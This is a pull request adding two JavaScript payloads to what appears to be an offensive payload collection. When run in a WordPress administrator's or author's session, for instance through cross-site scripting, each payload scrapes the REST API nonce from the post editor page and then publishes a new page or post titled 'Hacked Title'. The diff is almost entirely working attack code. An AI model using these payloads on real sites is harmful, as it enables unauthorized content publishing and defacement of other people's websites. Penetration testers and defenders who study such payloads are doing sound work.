### PR TITLE
Add payloads to create Wordpress post/page

### DIFF
--- a/wordpress_create_page.js
+++ b/wordpress_create_page.js
@@ -1,0 +1,24 @@
+/*
+Target: Wordpress - tested on 5.2.2 but probably works on other versions
+Action: Create a new page
+Context: Must be executed in the context of an administrator/author user
+*/
+
+var req = new XMLHttpRequest();
+
+// To get "nonce code"
+// That is a "number used once" to help protect URLs and forms from certain types of misuse, malicious or otherwise
+req.open("GET", "/wp-admin/post-new.php", false);
+req.send();
+
+var regex1 = /var wpApiSettings = (.*)/g;
+var regex2 = /"nonce":"([^"]*?)"/g;
+var nonce = regex1.exec(req.responseText)[1];
+var nonce = regex2.exec(nonce)[1];
+
+// Create page
+var url = "/wp-json/wp/v2/pages";
+req.open("POST", url, true);
+req.setRequestHeader('X-WP-Nonce', nonce)
+req.setRequestHeader("Content-Type", "application/json");
+req.send("{\"status\":\"publish\",\"title\":\"Hacked Title\",\"content\":\"Hacked Content\"}");

--- a/wordpress_create_post.js
+++ b/wordpress_create_post.js
@@ -1,0 +1,24 @@
+/*
+Target: Wordpress - tested on 5.2.2 but probably works on other versions
+Action: Create a new post
+Context: Must be executed in the context of an administrator/author user
+*/
+
+var req = new XMLHttpRequest();
+
+// To get "nonce code"
+// That is a "number used once" to help protect URLs and forms from certain types of misuse, malicious or otherwise
+req.open("GET", "/wp-admin/post-new.php", false);
+req.send();
+
+var regex1 = /var wpApiSettings = (.*)/g;
+var regex2 = /"nonce":"([^"]*?)"/g;
+var nonce = regex1.exec(req.responseText)[1];
+var nonce = regex2.exec(nonce)[1];
+
+// Create post
+var url = "/wp-json/wp/v2/posts";
+req.open("POST", url, true);
+req.setRequestHeader('X-WP-Nonce', nonce)
+req.setRequestHeader("Content-Type", "application/json");
+req.send("{\"status\":\"publish\",\"title\":\"Hacked Title\",\"content\":\"Hacked Content\"}");


### PR DESCRIPTION
# Description

This code is a simple payload to create page/post contents directly in Wordpress. 

Fix issue #1 

# How

1. Make a get request to get the _nonce number_ from `wpApiSettings`.
2. Make a post request to create a post/page directly in Wordpress.